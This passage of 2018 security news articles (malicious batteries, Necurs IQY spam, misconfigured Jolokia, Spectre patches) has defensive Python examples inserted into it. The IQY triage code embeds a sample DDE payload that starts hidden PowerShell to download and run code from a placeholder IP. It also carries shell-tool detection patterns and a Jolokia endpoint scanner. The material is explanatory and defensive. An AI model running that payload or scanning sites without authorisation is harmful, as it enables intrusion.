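def contains_dde_launch(cell_text: str) -> bool:
    """True if a fetched cell value has the DDE launch shape (=app|topic!item)."""
    return _DDE_LAUNCH.search(cell_text) is not None


if __name__ == "__main__":
    # Constructed sample: a promo-themed query pointing at a TEST-NET address.
    sample = "WEB\n1\nhttp://203.0.113.10/promo/discount.iqy?offer=1\n\nSelection=AllTables\nFormatting=None\n"
    rep = assess_iqy(sample)
    print(rep.url, rep.reasons)
```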


One more reason to hate your cellphone battery when it sends private data to the bad actors
26.6.2018 securityaffairs Mobil

Security researchers demonstrated how a “poisoned” cellphone battery in smartphones can be leveraged to “infer characters typed on a touchscreen”.

We’ve heard about stealing information through blinking hard drive lights and computer speakers, but would you believe the battery in your cell phone can also leak potentially sensitive information?

Researchers at Technion Center for Security Science and Technology (CSST), Hebrew University and University of Texas at Austin have published a paper (Power to peep-all: Inference Attacks by Malicious Batteries on Mobile Devices) explaining how “poisoned” batteries in smartphones can be leveraged to “infer characters typed on a touchscreen; to accurately recover browsing history in an open-world setup; and to reliably detect incoming calls, and the photo shots including their lighting conditions.” Going further, the researchers also describe how the Battery Status API can be used to remotely capture the sensitive information.

The “attack” starts by replacing the battery in the target smartphone with a compromised one, perhaps by poisoning the supply chain, gaining surreptitious access to the device, or selling the batteries through aftermarket resellers. The specific method is left as a thought exercise; for the risk analysis, we assume that the battery has been replaced and is thus exploitable.

Smartphone users will tell you that the battery is the most frustrating component of their devices. To improve this experience, smartphone batteries include technology to report on current charge rates, discharge rates, charging method, etc. With this information, the device can provide feedback to the user and change operating behavior to maximize battery life.

This requires a communications channel between the battery and the smartphone, and this is the channel the researchers leveraged to exfiltrate data. The information is not restricted to the operating system: it is also exposed through the Battery Status API as defined by the W3C, meaning it can be captured by a malicious website if accessed through a vulnerable browser (Chrome). So the attack starts with a compromised battery, leverages the Battery Status API to expose the captured data, and sends it to a malicious website through a vulnerable browser. Lots of moving pieces to line up, but plausible. So what information can be exposed this way?

The researchers showed an ability to identify the characters typed on the screen, identify incoming phone calls, determine when a picture is taken and identify metadata for that photo. The characters being typed aren’t read directly, but the poisoned battery infers what is typed by measuring the effect on battery parameters.

This has an effect on the accuracy of the information being captured. Determining when a picture is taken or when a call is received is accurate 100% of the time. But identifying what characters are typed is only accurate 36% of the time. If the eavesdropper is able to narrow the potential characters being typed, for example, if it is known the person is typing a website URL or booking tickets on a travel website, accuracy increases to 65%.

When considering all of the potential cyber threats that exist, this definitely counts as a low risk. Replacing a cell phone battery is difficult to do without the owner being aware, and even if you manage to change the battery, the information it gathers is prone to error and capturing the information remotely is a complex endeavor. But the risk is tangible, and if not mitigated, it could grow to become significant. Mozilla and Apple have already removed support for the Battery Status API from their browsers, and the W3C organization has updated the Battery Status API specification.

Currently, Chrome is the only “vulnerable” means of exfiltrating the data through this specific attack. However as we have seen repeatedly, once a novel approach is identified, others will expand and evolve the attack. This will be an interesting one to watch.


FireEye Denies Hacking Back Against Chinese Cyberspies
26.6.2018 securityweek  CyberSpy

In his latest book, New York Times correspondent David Sanger describes how cybersecurity firm Mandiant hacked into the devices of Chinese cyberspies during its investigation into the threat group known as APT1.

Mandiant, now owned by FireEye, published its famous report on APT1 back in 2013 when it was led by CEO Kevin Mandia. The company at the time released information apparently showing that the Chinese military had been conducting sophisticated cyber-espionage operations.

In his book, “The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age,” Sanger describes how he was allowed to watch Mandiant hack into the hackers’ systems. An excerpt of Sanger’s book shared on Twitter by Thomas Rid, a Professor of Strategic Studies at Johns Hopkins University, reads:

“Ever resourceful, Mandia’s staff of former intelligence officers and cyber experts tried a different method of proving their case. They might not be able to track the IP addresses to the Datong Road high-rise itself, but they could actually look inside the room where the hacks originated. As soon as they detected Chinese hackers breaking into the private networks of some of their clients – mostly Fortune 500 companies – Mandia's investigators reached back through the network to activate the cameras on the hackers' own laptops. They could see their keystrokes while actually watching them at their desks.

The hackers, just about all of them male and most in their mid twenties, carried on like a lot of young guys around the world. They showed up at work about eight-thirty a.m. Shanghai time, checked a few sports scores, emailed their girlfriends, and occasionally watched porn. Then, when the clock struck nine, they started methodically breaking into computer systems around the world, banging on the keyboards until a lunch break gave them a moment to go back to the scores, the girlfriends, and the porn.

One day I sat next to some of Mandia's team, watching the Unit 61938 hacking corps at work; it was a remarkable sight. My previous mental image of PLA officers was a bunch of stiff old generals sitting around in uniforms with epaulets, reminiscing about the glory days with Mao. But these guys were wearing leather jackets or just undershirts [...].”

In a statement published on Monday, FireEye admitted that Sanger was given access to the methods used by Mandiant to gather evidence of APT1’s ties to the Chinese military, but claims the reporter’s description “resulted in a serious mischaracterization of our investigative efforts.”

“We did not do this, nor have we ever done this,” FireEye said regarding claims that its employees activated the cameras on the hackers’ own laptops. “To state this unequivocally, Mandiant did not employ ‘hack back’ techniques as part of our investigation of APT1, does not ‘hack back’ in our incident response practice, and does not endorse the practice of ‘hacking back.’”

“Hacking back,” the term used to describe a cyberattack victim – or someone hired by the victim – breaking into the systems of the attacker, is a controversial practice, and only a few cybersecurity firms have admitted doing it.

FireEye claims that what Sanger described as hacking back were actually video recordings of the attackers interacting with their malware command and control (C&C) servers. The firm has published one of the videos it presumably showed the reporter.

“To someone observing this video ‘over the shoulder’ of one of our investigators, it could appear as live system monitoring. Nevertheless, Mandiant did not create these videos through ‘hacking back’ or any hacking activity. All of these videos were made through information obtained via consensual security monitoring on behalf of victim companies that were compromised,” FireEye explained.

While some industry professionals have accepted FireEye’s explanation for obtaining data on the hackers’ personal online activities, Sanger’s claims that he saw APT1 members wearing leather jackets raises a lot of questions. FireEye has not specifically addressed this issue in its statement, but SecurityWeek is trying to obtain some clarifications from the company. In the meantime, experts have provided some more or less plausible explanations on how the reporter may have seen what he believed were the hackers.

Richard Bejtlich, who worked for Mandiant and then FireEye between 2011 and 2017, including as Chief Security Strategist, has corroborated FireEye’s statement.

“At no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems,” Bejtlich wrote in a blog post. “During my six year tenure, we were publicly and privately a ‘no hack back’ company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.”


Mobile Devices Exposed to Spying via Malicious Batteries: Researchers
26.6.2018 securityweek  Virus

A team of researchers has demonstrated that specially crafted batteries installed in a smartphone can allow malicious actors to harvest and exfiltrate sensitive information.

Researchers from Technion, UT Austin and Hebrew University showed that an attacker can use a malicious battery to obtain various types of information from a device by continuously monitoring power traces. Monitoring the GPU and DRAM can work, but the CPU and the touchscreen leak the most information, experts said.

Experiments have shown that attackers can – with various degrees of accuracy – deduce characters typed via the touchscreen, recover browsing history, and detect incoming calls and when a photo has been taken. Exfiltrating the data is also possible, one bit at a time, through the device’s web browser.

The level of accuracy for determining keystrokes was 36%, and researchers showed that attackers can even search for passwords. In the case of detecting which website the victim has visited from a list of Alexa Top 100 sites, the researchers achieved an accuracy of 65%. An attacker can – with 100% accuracy – detect when a phone call has been made. Experiments also showed a high accuracy related to the use of the camera. In addition to detecting when a photo has been taken, an attacker can obtain data on the use of the flash and lighting conditions, researchers said in their paper.

The method requires replacing the targeted device’s battery with a malicious one, either through a supply chain, evil maid or other type of attack. Due to this reason, combined with the fact that the exfiltration and data harvesting are slow and not always accurate, it’s unlikely that such attacks will be seen in the wild any time soon.

On the other hand, the attack is interesting, especially since it’s stealthy: it has a small hardware footprint and does not require installing any software on the targeted device. It is also low cost, and it leverages a component that users often replace themselves. In one attack scenario described by the researchers, the attacker sells batteries online, offering low prices or an extended warranty to attract potential victims.

As for data exfiltration, researchers used the Battery Status API. This API was removed by Mozilla and Apple from their web browsers after experts showed that it posed some potentially serious privacy risks, but it’s still present in Chrome.

This API exposes three parameters: time to full charge and discharge, battery level, and charging state. The researchers showed that the charging state parameter (a flag that is 1 when the battery is charging and 0 when it is discharging) can be manipulated for data exfiltration via the device’s wireless charging support.

When a phone is charged wirelessly, the battery charging state parameter changes when an active transmitter is detected by the device. By placing a circuit that mimics the wireless charger inside the battery, an attacker can control the charging state to send out bits of “0” or “1”. The attacker needs to convince the victim to access a specially crafted website that can read this data via the Battery Status API. Since this is a bidirectional communication channel, the malicious battery can be configured to detect when the attacker’s site is visited by the victim.

However, the time it takes to detect the transition between not charging and charging is 3.9 seconds and the transition back to not charging is 1.6 seconds, which results in an exfiltration rate of 0.1-0.5 bits per second.

“The attack may seem like a stretch (requires physical battery replacement – or poisoning hardware at a factory), and at this moment one can imagine multiple simpler methods,” commented Lukasz Olejnik, one of the researchers whose work led to Mozilla and Apple removing support for the Battery Status API a couple of years ago. “Nonetheless it is an important study. Is the sky falling? No. Is the work significant? Yes.”

Last year, Olejnik conducted an analysis of the security and privacy implications associated with the ambient light sensors present in phones, tablets and laptops.


China-linked Hackers Targeting Air-Gapped Systems: Report
26.6.2018 securityweek  Attack

The cyber espionage group known as "Tick" has been targeting a secure USB drive built by a South Korean defense company, likely in an attempt to compromise air-gapped systems, Palo Alto Networks reports.

Also known as Bronze Butler, Tick is believed to be based in China and to have been active for at least a decade, although it was detailed for the first time only in April 2016. The group is mainly targeting Japan and South Korea, but variants of their malware were also observed in attacks on organizations in Russia, Singapore, and China.

To date, the group has been observed employing a variety of custom malware families, including Minzen, Datper, Nioupale (aka Daserf), and HomamDownloader.

The attempt to weaponize a secure USB drive is an attack technique uncommon for the actor, which led security researchers to the conclusion that the assault was likely aiming at air-gapped systems (machines that are not connected to the public Internet).

The malware used in these attacks was designed to target systems running Windows XP or Windows Server 2003, which are older, out-of-support OS versions. Air-gapped systems, Palo Alto says, are commonly used in many countries by government, military, and defense contractors, and other industry verticals.

Although no public reports of the attack were published until now, the malware observed in this incident was likely used many years ago.

“Based on the data collected, we do not believe this malware is part of any active threat campaign,” Palo Alto says.

Although they don’t have a complete picture of the past attack, the researchers believe Tick managed to compromise the secure USB drive model and load a malicious file onto an unknown number of devices, which are supposedly certified as secure by the South Korean ITSCC.

The group also created a malware family dubbed SymonLoader, which, once running on one of these older Windows machines, continuously looks for the targeted USB drives. When it detects the presence of a targeted secure USB drive, SymonLoader attempts to load the unknown malicious file using low-level disk access rather than regular file APIs (it saves the file to the temp directory and executes it).

Without a compromised USB drive or the unknown malicious file, the security researchers were not able to determine the manner in which the USB drives have been compromised.

“Specifically, we do not know if there has been a successful compromise in the supply-chain making these devices, or if these have been compromised post-manufacturing and distributed using other means such as social engineering,” Palo Alto notes.

The malware loader was observed being installed by a Trojanized version of a legitimate Japanese-language Go game, which was first observed on January 21, 2018. Previously, the Trojanized application was seen dropping HomamDownloader, which can install malicious files from a remote command and control (C&C) server.

“Despite the differences from previous samples, we believe this sample is related to the Tick group because the shellcode in the Trojanized Japanese game is exactly the same as that found in the Trojanized Korean programs described earlier. Also, SymonLoader shares code with HomamDownloader,” Palo Alto says.

The analyzed SymonLoader sample was apparently compiled on September 26, 2012, by which time both Windows 7 and Windows Server 2008 had already been released. The malware, however, specifically targets only Windows XP and Windows Server 2003, and only searches for USB drives built by a South Korean company that develops information and communication security equipment for the military, police, government agencies and public institutions.

“The attacker encrypted the unknown executable file and concealed it at the ending part of the secure USB storage in advance. The hidden data is not accessible through logical file operation APIs, such as ReadFile(). Instead, SymonLoader uses Logical Block Addressing (LBA) and SCSI commands to read the data physically from the particular expected location on the removable drive,” the researchers explain.


North Korean Hackers Exploit HWP Docs in Recent Cyber Heists
26.6.2018 securityweek  BigBrothers

A series of malicious Hangul Word Processor (HWP) documents used in recent attacks on cryptocurrency exchanges have been attributed to the North Korea-linked Lazarus group, AlienVault reports.

The attacks appear to include the recent assault on Bithumb, the largest virtual currency exchange in South Korea, with more than 1 million customers. As part of the incident, hackers managed to steal over $30 million worth of cryptocurrencies.

Lazarus, or BlueNoroff, is a state-sponsored hacking group believed to have launched the $81 million cyber heist from the Bangladesh Bank in 2016 and considered the most serious threat against banks. Earlier this year, the group was observed hitting an online casino in Central America and switching interest to crypto-currency.

Earlier this month, AlienVault revealed that Lazarus has been leveraging a new ActiveX vulnerability in attacks on South Korean targets. Now, the security firm says that the hackers have also been using a series of malicious documents to target members of a recent G20 Financial Meeting.

AlienVault's security researchers analyzed three similar malicious documents that have been already associated with Lazarus. One of these mentions the G20 International Financial Architecture Working Group meeting, seeking coordination of the economic policies between the wealthiest countries.

The HWP files include malicious code that fetches the next-stage malware (either a 32- or 64-bit version of Manuscrypt, which has already been detailed by other security researchers), a threat that disguises its command-and-control traffic as communication with South Korean forum software. Decoy resume documents were also included.

A series of reports within South Korea have already suggested that malicious HWP files were used earlier in May and June to set up the Bithumb heist, and that these documents appear linked to previous attacks by Lazarus.

The investigation of a South Korean security company into the thefts also revealed that fake resumes strikingly similar to those delivering the Lazarus-linked Manuscrypt were sent to cryptocurrency organizations.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,” AlienVault notes.

Related malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea earlier this month.

Furthermore, the researchers noticed cryptocurrency phishing domains registered to the same phone number as a domain (itaddnet[.]com) and delivering some of the malware. This would suggest the attackers are also phishing for credentials, in addition to delivering malware.

“It is unusual to see Lazarus registering domains - normally they prefer to compromise legitimate websites. So this would be an unusual attack if it is indeed run by members of Lazarus,” AlienVault says.

Lazarus could plausibly have hacked Bithumb earlier this month, considering that the group also raided the exchange last year, which likely gave it the knowledge needed to do it again. Over the past year, the group has targeted other cryptocurrency exchanges as well.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available - the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organizations have the double impact of weakening their closest competitor,” AlienVault said.


EU States to Form 'Rapid Response' Cyber Force: Lithuania
26.6.2018 securityweek Cyber

Nine European Union states are to create rapid response teams to counter cyber attacks within the framework of a new EU defence pact, project leader Lithuania announced on Thursday.

"Nine states have agreed to join. The goal is to create rotational EU cyber rapid response teams," Defence Minister Raimundas Karoblis told AFP.

He said his counterparts from Croatia, Estonia, the Netherlands and Romania will join him on Monday to sign the agreement in Luxembourg while Finland, France, Poland and Spain will join later this year.

Teams formed by pooling experts on a rotational basis will be ready to help national authorities to tackle cyber attacks, with the schedule to be approved next year, Karoblis said.

The minister said he expected the EU to allocate funds for software and other equipment, adding that talks with EU institutions will continue about legal and technical aspects.

The cyber force will be among the first joint projects launched under a landmark EU defence pact signed last year.

The EU's move to establish the Permanent Structured Cooperation on security and defence, known as PESCO, was driven in part by US President Donald Trump's questioning of NATO's relevance and Britain's departure from the bloc.

Lithuania, a lead nation of the cyber defence project, has boosted its cyber capabilities in recent years to tackle what it describes as "hostile cyber activities" from nearby Russia, mostly targeting state institutions and the energy sector.


Necurs Campaign Uses Internet Query File Attachments
26.6.2018 securityweek  BotNet

The Necurs botnet has been using Internet Query (IQY) files in recent waves of spam attacks in an effort to thwart security protections.

Active since at least 2012 and currently considered to be the largest spam botnet, the operation has been famous for powering massive Locky ransomware campaigns in 2016 and 2017. The botnet ended last year with a spike in activity and was sending tens of millions of spam emails daily.

This past April, the botnet was observed using .URL files with modified icons to trick users into believing they were opening a different file type. The files leveraged the Server Message Block (SMB) protocol to execute a payload from a remote server, thus evading certain spam filters.

Necurs has now switched to a new tactic to avoid detection and increase the chances of successful infection. IQY files are plain-text files in a specific format that let users import data from external sources into Excel spreadsheets; Windows opens them in Excel by default, so double-clicking the attachment runs the query.

The spam emails using IQY file attachments feature subject and file names containing terms that refer to sales promotions, offers, and discounts, Trend Micro reveals in a new report.

Once opened, the IQY file queries the URL specified in its body, and the data returned from that URL is pulled into an Excel worksheet.

The fetched data, Trend Micro discovered, contains a script that abuses Excel’s Dynamic Data Exchange (DDE) feature to execute a command line and start a PowerShell process. Through this process, a remote PowerShell script is executed filelessly on the targeted system.
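The two hops described above (the .iqy attachment pointing at a URL, and the fetched content carrying a DDE formula) can be triaged at the mail gateway before Excel ever sees them. The following is an added example, not code from the Trend Micro report or from the Necurs operation: it parses the IQY format, scores the query URL, and flags DDE formulas in whatever the URL returns. The sample attachment, the sample fetched content and the IP 203.0.113.10 are constructed for the example; the detection heuristics (bare IP host, cleartext HTTP, a `=app|'topic'!item` DDE link, shell host names) are the author's assumptions, not Trend Micro's detection logic.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed samples in the format Trend Micro describes; not real Necurs artefacts.
IQY_SAMPLE = "WEB\n1\nhttp://203.0.113.10/QIxfC.dat\n"
FETCHED_SAMPLE = (
    "=cmd|' /C powershell -NoP -w hidden -c "
    "IEX(New-Object Net.WebClient).DownloadString(\"http://203.0.113.10/1.dat\")'!A0"
)

DDE_PATTERNS = [
    re.compile(r"=\s*\w+\s*\|.*?!", re.S),      # =application|'topic'!item, the classic DDE link
    re.compile(r"\bDDE(?:AUTO)?\s*\(", re.I),   # =DDE("app","topic","item") worksheet function
]
SHELL_WORDS = re.compile(r"\b(cmd|powershell|mshta|rundll32|regsvr32|certutil)\b", re.I)


def parse_iqy(text):
    """Parse a .iqy web query: line 1 'WEB', line 2 version, line 3 URL, then key=value options."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    params = {}
    for ln in lines[3:]:
        key, _, val = ln.partition("=")
        params[key.strip()] = val.strip()
    return {"version": lines[1], "url": lines[2], "params": params}


def url_findings(url):
    """Reasons the query URL itself looks wrong for a business data feed."""
    u = urlsplit(url)
    findings = []
    if u.scheme != "https":
        findings.append("cleartext http")
    host = u.hostname or ""
    if not host:
        findings.append("no host")
    else:
        try:
            ipaddress.ip_address(host)
            findings.append("raw IP host")
        except ValueError:
            pass
    if re.search(r"\.(dat|txt|exe|ps1|bat|hta)$", u.path, re.I):
        findings.append("non-data file extension")
    return findings


def dde_findings(content):
    """Reasons the fetched web-query content would make Excel launch a program."""
    findings = []
    for pat in DDE_PATTERNS:
        if pat.search(content):
            findings.append("DDE formula")
            break
    if SHELL_WORDS.search(content):
        findings.append("shell/scripting host referenced")
    return findings


def triage(iqy_text, fetched_content=None):
    """Decide whether to block: a DDE payload or a query to a bare IP is enough on its own."""
    q = parse_iqy(iqy_text)
    uf = url_findings(q["url"])
    df = dde_findings(fetched_content) if fetched_content is not None else []
    return {"url": q["url"], "url_findings": uf, "dde_findings": df,
            "block": "DDE formula" in df or "raw IP host" in uf}


if __name__ == "__main__":
    print(triage(IQY_SAMPLE, FETCHED_SAMPLE))
```

Fetching the URL from a sandbox (rather than letting the user's Excel do it) is what makes the second check possible; an IQY that only ever returns CSV passes, one that returns a `=cmd|'...'!` formula is blocked regardless of how benign the URL looks.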

The script was designed to download an executable file, a Trojanized remote access application, and its final payload: the FlawedAMMYY backdoor. The malware was supposedly built using the leaked code of the Ammyy Admin remote access Trojan.

As part of more recent attacks, the script would download an image file before the final payload. This image, the security researchers say, is a disguised malware downloader that fetches an encrypted component file containing the same main backdoor routines.

FlawedAMMYY was designed to execute a series of commands received from a remote malicious server, including: file manager, view screen, remote control, audio chat, RDP SessionsService (install/start/stop/remove), disable desktop background, disable desktop composition, disable visual effects, and show tooltip (mouse cursor blinking cause).

“Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity. In addition, its structure is the same as normal Web Queries. Therefore, a security solution that blocks malicious URLs could be used to defend against this threat,” Trend Micro notes.

Strict security protocols and best practices are essential to stay protected against such threats. Also, because this is a known attack vector, Excel shows two warning prompts when an IQY attachment is opened (one before enabling the external data connection, and one before launching the application the DDE command points to); paying attention to those warnings can stop the infection.


Wi-Fi Alliance Launches WPA3 Security Standard
26.6.2018 securityweek  Safety

The Wi-Fi Alliance, the non-profit organization whose global network of members maintains Wi-Fi technology, announced late on Monday the launch of the WPA3 security standard.

Unveiled in January, the latest version of the Wi-Fi Protected Access (WPA) protocol brings significant improvements in terms of authentication and data protection.

The Wi-Fi Alliance will continue to maintain and improve WPA2, which is mandatory for Wi-Fi Certified devices, as it will likely take several years until WPA3 is widely adopted. The two versions of the protocol will maintain interoperability through a transitional mode of operation and WPA3 will become mandatory once adoption grows.

WPA3 has two modes of operation: Personal and Enterprise. WPA3-Personal’s key features include enhanced protection against offline dictionary attacks and password guessing attempts, improved security even if users choose less complex passwords, and the use of forward secrecy in order to protect communications even if a password has been compromised.

WPA3-Enterprise provides 192-bit encryption for networks that require extra security (e.g. the networks of government and financial organizations), improved network resiliency, and greater consistency when it comes to the deployment of cryptographic tools.

Both the Personal and Enterprise modes prohibit the use of legacy protocols, and they require Protected Management Frames (PMF), which provides protection against eavesdropping and forging. PMF is also available for WPA2.

“WPA3 takes the lead in providing the industry’s strongest protections in the ever-changing security landscape,” said Edgar Figueroa, president and CEO of the Wi-Fi Alliance. “WPA3 continues the evolution of Wi-Fi security and maintains the brand promise of Wi-Fi Protected Access.”

The Wi-Fi Alliance also announced the introduction of Easy Connect, a system that makes it easier for users to connect smart home and other Internet of Things (IoT) devices to their wireless networks. Wi-Fi Easy Connect simplifies the process by allowing users to add devices by scanning a QR code with a smartphone or tablet.

Earlier this month, the Wi-Fi Alliance also announced the launch of Wi-Fi Enhanced Open, a certification program that provides protection for unauthenticated networks, such as the ones commonly found in coffee shops, hotels and airports.

The system is designed to protect connections against passive eavesdropping without requiring a password by using Opportunistic Wireless Encryption (OWE) to provide each user unique individual encryption that secures traffic between their device and the Wi-Fi network.


Misconfigured Java web server component Jolokia exposes websites to cyber attacks
26.6.2018 securityaffairs Hacking

Several websites using a misconfigured Java web server component, Jolokia, are exposed to cyber attacks, including high-profile sites operated by financial organizations.

Security researcher Mat Mannion found that Jolokia, an agent that exposes Java Management Extensions (JMX) over HTTP, is often deployed in a way that allows denial of service, information disclosure and other potential attacks against Java web servers.

According to Mannion, some distributions of Jolokia, such as the WAR agent, are “insecure by default.”

“Unfortunately, in a lot of cases this doesn’t happen, and the Jolokia agent is simply deployed as jolokia.war or similar. If Tomcat then serves requests directly or behind a reverse proxy, this then leaves the Jolokia endpoint visible by a reliable URL. If this isn’t then secured by a firewall (or similar), the /jolokia endpoint can be left open to the whole Internet without authentication.” reads the security advisory published by Mannion.

“Tomcat (and other servlet containers) export an enormous amount of information over JMX and Jolokia allows execution of arbitrary commands against these MBeans, which can lead to sensitive information disclosure or a DoS [denial of service],” Mannion added.


The researcher also published a proof-of-concept exploit against an Apache Tomcat 8 servlet container, noting that it could easily be adapted to other servlet containers.

The researcher scanned the Internet for domains with a misconfigured Jolokia endpoint, found many vulnerable websites, and notified them via HackerOne.

“I wrote a small program to scan the Alexa top 1 million websites and to check for an unsecured /jolokia endpoint. If found, this discloses the servlet container and version.” wrote the expert.

“For each domain, the following URLs were attempted:

http://$DOMAIN$/jolokia
http://www.$DOMAIN$/jolokia
http://$DOMAIN$:8080/jolokia
https://$DOMAIN$/jolokia
https://www.$DOMAIN$/jolokia
https://$DOMAIN$:8443/jolokia"
Out of the 1,000,000 domains, the results were:

Result           No. of domains
Exploitable                 147
401                        2016
Other 2xx                340488
Other 4xx                205645
Timeout/error            451704
A 401 response indicates that the Jolokia endpoint was present but protected by some kind of authentication.
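The scan above reduces to one question per URL: does an unauthenticated GET on /jolokia answer with the agent's JSON, a 401, or something else? The following is an added example, not Mannion's scanner: it builds the six URL shapes listed above, probes them, and classifies each response into the same categories as the results table. It assumes the response shape of Jolokia's version reply (a JSON object whose `value.agent` holds the agent version and whose `value.info` names the servlet container), and the sample body is constructed in that shape; the assumed category names and the `jolokia-exposure-check` user agent are the author's choices. Only run it against domains you are authorized to test.

```python
import json
import socket
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen


def candidate_urls(domain):
    """The six URL shapes tried per domain in the scan above."""
    return [
        f"http://{domain}/jolokia",
        f"http://www.{domain}/jolokia",
        f"http://{domain}:8080/jolokia",
        f"https://{domain}/jolokia",
        f"https://www.{domain}/jolokia",
        f"https://{domain}:8443/jolokia",
    ]


def classify(status, body):
    """Map one HTTP response to the categories used in the results table.

    An unauthenticated GET on the agent root answers Jolokia's 'version' request,
    whose JSON carries the agent version plus the servlet container in value.info
    (assumed layout).  Returns (category, detail)."""
    if status == 401:
        return "401", None
    if 200 <= status < 300:
        try:
            doc = json.loads(body)
        except ValueError:
            return "other 2xx", None
        value = doc.get("value") if isinstance(doc, dict) else None
        if isinstance(value, dict) and "agent" in value:
            info = value.get("info") or {}
            detail = f"{info.get('product', '?')} {info.get('version', '?')} (jolokia agent {value['agent']})"
            return "exploitable", detail
        return "other 2xx", None
    if 400 <= status < 500:
        return "other 4xx", None
    return "other", None


def probe(url, timeout=5):
    """Fetch one candidate URL and classify it; network failures count as timeout/error."""
    req = Request(url, headers={"User-Agent": "jolokia-exposure-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return classify(resp.getcode(), resp.read(65536).decode("utf-8", "replace"))
    except HTTPError as e:
        return classify(e.code, "")
    except (URLError, socket.timeout, OSError):
        return "timeout/error", None


def scan_domain(domain):
    """Stop at the first exploitable hit; otherwise report every URL's category."""
    results = {}
    for url in candidate_urls(domain):
        cat, detail = probe(url)
        results[url] = (cat, detail)
        if cat == "exploitable":
            return {"domain": domain, "exploitable": url, "detail": detail}
    return {"domain": domain, "exploitable": None, "results": results}


# Constructed response body in the shape of Jolokia's version reply (assumed layout).
SAMPLE_VERSION_BODY = json.dumps({
    "request": {"type": "version"},
    "value": {"agent": "1.3.7", "protocol": "7.2",
              "info": {"product": "tomcat", "vendor": "Apache", "version": "8.5.31"}},
    "status": 200,
})

if __name__ == "__main__":
    import sys
    for d in sys.argv[1:]:
        print(scan_domain(d))
```

An "exploitable" hit is also the fix checklist in reverse: the endpoint should either not be routable from the Internet, or sit behind a servlet security constraint (or Jolokia's own access policy) so that the same GET comes back as a 401.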

Fortunately, many of the affected websites addressed the issue before the researcher made his findings public.

Mannion also notified the Jolokia maintainer and the Apache security team. The disclosure timeline is below.

Date                 Event
24th May 2018        Initial discovery, start scan
25th May 2018        Disclosure to HackerOne
26th-28th May 2018   Disclosure to affected domains, maintainer of Jolokia and Apache security team
25th June 2018       Public disclosure


Oracle issued security patches for recently discovered Spectre and Meltdown issues
26.6.2018 securityaffairs Vulnerability

Last week Oracle started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown flaws.
In May, Intel, AMD, ARM, IBM, Microsoft and other tech firms jointly disclosed two new variants of the Meltdown and Spectre issues.

The so-called Variant 4 (CVE-2018-3639) is a Speculative Store Bypass (SSB), while Variant 3a (CVE-2018-3640) is a Rogue System Register Read.

Both Variant 4 and Variant 3a require local access to exploit, which is why they have been rated “medium severity”.

According to Oracle’s security advisory, Variant 4 affects Oracle Linux versions 6 and 7 and Oracle VM 3.4.

“Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.” reads the security advisory published by Oracle.

Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel.

“Two new processor vulnerabilities were publicly disclosed on May 21, 2018. They are vulnerabilities CVE-2018-3640 ( “Spectre v3a” or “Rogue System Register Read”) and CVE-2018-3639 (“Spectre v4” or “Speculative Store Buffer Bypass”). Both vulnerabilities have received a CVSS Base Score of 4.3.

Successful exploitation of vulnerability CVE-2018-3639 requires local access to the targeted system. Mitigating this vulnerability on affected systems will require both software and microcode updates.” states Oracle in a blog post

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,”
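Oracle's note that Variant 4 needs "both software and microcode updates" has a practical consequence worth checking after patching: on Linux kernels carrying the SSBD patches (Oracle Linux 6 and 7 included), the Speculative Store Bypass mitigation is by default applied only to processes that ask for it via prctl(2) or run under seccomp, and the sysfs status line says so. The following is an added example, not Oracle's or the kernel's code: it interprets the sysfs vulnerability file, decodes the prctl bitmask, and lets a sensitive process opt itself in. It assumes a Linux target with the SSBD prctl interface (the constants are the ones from the kernel's uapi prctl.h); on other systems the prctl calls simply report unavailable.

```python
import ctypes
import ctypes.util
import os

VULN_DIR = "/sys/devices/system/cpu/vulnerabilities"

# prctl(2) constants from the Linux kernel's SSBD patches (include/uapi/linux/prctl.h).
PR_GET_SPECULATION_CTRL = 52
PR_SET_SPECULATION_CTRL = 53
PR_SPEC_STORE_BYPASS = 0
PR_SPEC_NOT_AFFECTED = 0
PR_SPEC_PRCTL = 1 << 0
PR_SPEC_ENABLE = 1 << 1
PR_SPEC_DISABLE = 1 << 2
PR_SPEC_FORCE_DISABLE = 1 << 3


def ssb_status(text):
    """Interpret /sys/devices/system/cpu/vulnerabilities/spec_store_bypass.

    'Mitigation: ... via prctl and seccomp' means kernel and microcode support SSBD,
    but only tasks that request it (or run under seccomp) are actually protected."""
    t = text.strip()
    if not t:
        return "unknown"          # file missing: kernel predates the SSBD patches
    if t.startswith("Not affected"):
        return "not_affected"
    if t.startswith("Vulnerable"):
        return "vulnerable"       # kernel or microcode without SSBD support
    if t.startswith("Mitigation:"):
        return "opt_in" if ("prctl" in t or "seccomp" in t) else "global"
    return "unknown"


def read_sysfs_status(name="spec_store_bypass"):
    try:
        with open(os.path.join(VULN_DIR, name)) as f:
            return f.read()
    except OSError:
        return ""


def describe_spec_flags(flags):
    """Decode the bitmask returned by prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS)."""
    if flags == PR_SPEC_NOT_AFFECTED:
        return "not_affected"
    if flags & PR_SPEC_FORCE_DISABLE:
        return "force_disabled"
    if flags & PR_SPEC_DISABLE:
        return "disabled"
    if flags & PR_SPEC_ENABLE:
        return "enabled"          # speculative store bypass still allowed for this task
    return "unknown"


def _libc():
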